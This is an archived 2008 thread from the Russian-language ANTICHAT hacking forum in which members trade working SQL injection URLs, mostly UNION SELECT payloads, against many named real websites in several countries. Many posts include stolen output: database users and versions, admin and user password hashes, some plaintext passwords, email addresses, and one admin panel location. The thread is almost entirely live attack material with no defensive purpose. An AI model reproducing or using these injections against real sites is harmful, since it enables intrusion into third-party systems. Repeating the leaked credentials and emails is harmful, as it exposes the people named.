ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

07.01.2008, 19:55
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме: 1122391
Репутация:
209
|
|
http://www.abruzzoverdeblu.it/?id=-67+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23/*
http://www.fuorissimo.it/php-bin/joke/users.php?ID=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12/*
http://www.casoniatuttabirra.it/artista.php?id=-1+union+select+1,2,3,4,user(),6,7/*
|
|
|

07.01.2008, 21:47
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
http://www.tigella.it/news.php?ID=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
-----------------------------------------------------------------------
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8+from+mysql.user/*
Пароль не отображается((
|
|
|

07.01.2008, 22:14
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме: 1273248
Репутация:
785
|
|
edinteractive.co.uk
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6/*
USER:ediadmin@scary
VERSION:5.0.45-community-log
DATABASE:edi
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,column_name,4,5,6+from+information_schema.columns/*
- названия всех колонок
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,table_name,4,5,6+from+information_schema.tables/*
- названия всех таблиц
Имя проекта CMC )
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,concat(id,0x3a,project_name,0x3a,website_link),4,5,6+from+aei_portfolio/*
|
|
|

08.01.2008, 00:29
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме: 1877761
Репутация:
237
|
|
Код:
http://www.naushko.ru/whisper.php?id=-3887+union+select+1,2,3,concat_ws(0x2F,userid,name,pass,email),5,6+from+users+limit+2,2/*
Version 5.026
name/pass/mail
Руслан/asdsdf/ruslan@yusufov.com
Perfecto/prf/ruperfecto@yandex.ru
|
|
|

08.01.2008, 01:31
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме: 686641
Репутация:
205
|
|
http://www.afa.org.tw/
Код HTML:
http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9/*
4.1.20:afa@localhost:afa
Код HTML:
http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,admin_password,6,7,8,9+FROM+admin/*
a65660c1c91cd0a717c1d3ebc7f66c68 (если кому-то надо, админка тут: http://www.afa.org.tw/admin/, а мыло: info@afa.org.tw)
Код HTML:
http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,username,user_password,user_email),6,7,8,9+FROM+phpbb_users+LIMIT+1,1/*
JChen:b51699d453f963ae42af5b37563e3ab2:spetsnaz@ms 29.hinet.net
...
P.S. Кажись сайт китайский, а я удивлялся почему у них форум какой-то левый 
|
|
|

08.01.2008, 01:34
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
http://www.studiolegalebartolini.it/news.php?id=-66+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.ipmaroma2008.it/news.php?ID=-00017+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,table_name+from+information_sc hema.tables/*&r=25
Все таблицы
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,column_name+from+information_s chema.columns/*&r=25
Все колонки
А дальше сами))
-----------------------------------------------------------------------
http://www.bppa.at/de/news.php?id=-18+union+select+1,2,3,4/*
-----------------------------------------------------------------------
http://metfan.de/news.php?id=-258+union+select+1,2,3,4,5,6,7,8,9/*
|
|
|

08.01.2008, 01:58
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме: 686641
Репутация:
205
|
|
2 Tigger
Доводи инъекции до конца или хотя бы выводи version(), user(), database().
Не оставляй просто так, только подобрав поля. Смысла нет =\
2 all =)
Код HTML:
http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&type_id=1
4.0.24:user12325072_1@superultra19.
Код HTML:
http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,name,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+users/*&type_id=1
Not important:tractor
http://www.zik.com.ua/
Код HTML:
http://www.zik.com.ua/index.php?news_id=45555+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
4.1.22-log:zik@localhost:zik
http://www.nisc.lt/
Код HTML:
http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
5.0.27-log:nisc@mysql50:nisc
Код HTML:
http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,convert(table_name+using+latin1),4,5+FROM+information_schema.tables/*
1: admin:fa2a336347b0da6f022232868d831c73: aivaras@knotdesign.com
9: martinas:16f48b6a5ffdf2665c25dba0a58df350: martinas@nisc.lt
10: olia:ade9fb3441b9794e97329a4adf2b4939: olia@nisc.lt
Последний раз редактировалось ~EviL~; 08.01.2008 в 03:44..
|
|
|

08.01.2008, 04:05
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме: 1541753
Репутация:
552
|
|
Код:
http://www.teasetrip.com/tnews.php?op=tnews&id=-447+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11+from+users+limit+1,1/*
Код:
http://www.actupix.net/tnews.php?op=tnews&id=-56+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users/*
Последний раз редактировалось SWAT; 08.01.2008 в 04:11..
|
|
|

08.01.2008, 05:24
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме: 16641028
Репутация:
2371
|
|
 http://vmashine.ru - В Машине.ру
Настройки своей страницы -> Управление автомобилями -> Добавление автомобиля -> Самое первое поле <options> так вот все value у <select> не фильтруются....заменяем value у любого параметра каким-нибудь firebug'om на -1 или '+blabla , ну вообщем все как делаете обычно только пост запросами....
Еще можно узнать локальный путь через сессии....подрезав их (c) ettte
|
|
|

08.01.2008, 06:34
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
http://www.cultura.usb.ve/
Код:
http://www.cultura.usb.ve/noticia.php?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,user(),database(),version())+using+latin1),5,6,7,8,9,10,11/*
http://www.davidluna.com.ve/
Код:
http://www.davidluna.com.ve/index.php?ID=-1+union+select+1,2,concat_ws(0x3a,login,password),4,5,6+from+login/*
http://www.forosocialmundial.org.ve/
Код:
http://www.forosocialmundial.org.ve/noticia_mas.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/*
http://www.tiburonesdelaguaira.com.ve/
Код:
http://www.tiburonesdelaguaira.com.ve/mostrar_noticia.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1/*
http://www.vaspuntofijo.com.ve/
Код:
http://www.vaspuntofijo.com.ve/repuestos.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())/*
http://galeria.uc.edu.ve/
Код:
http://galeria.uc.edu.ve/noticias.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4+from+mysql.user/*
root:*822F83E1D728CFD3D28DC5D309DE95F0EAC258E9
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|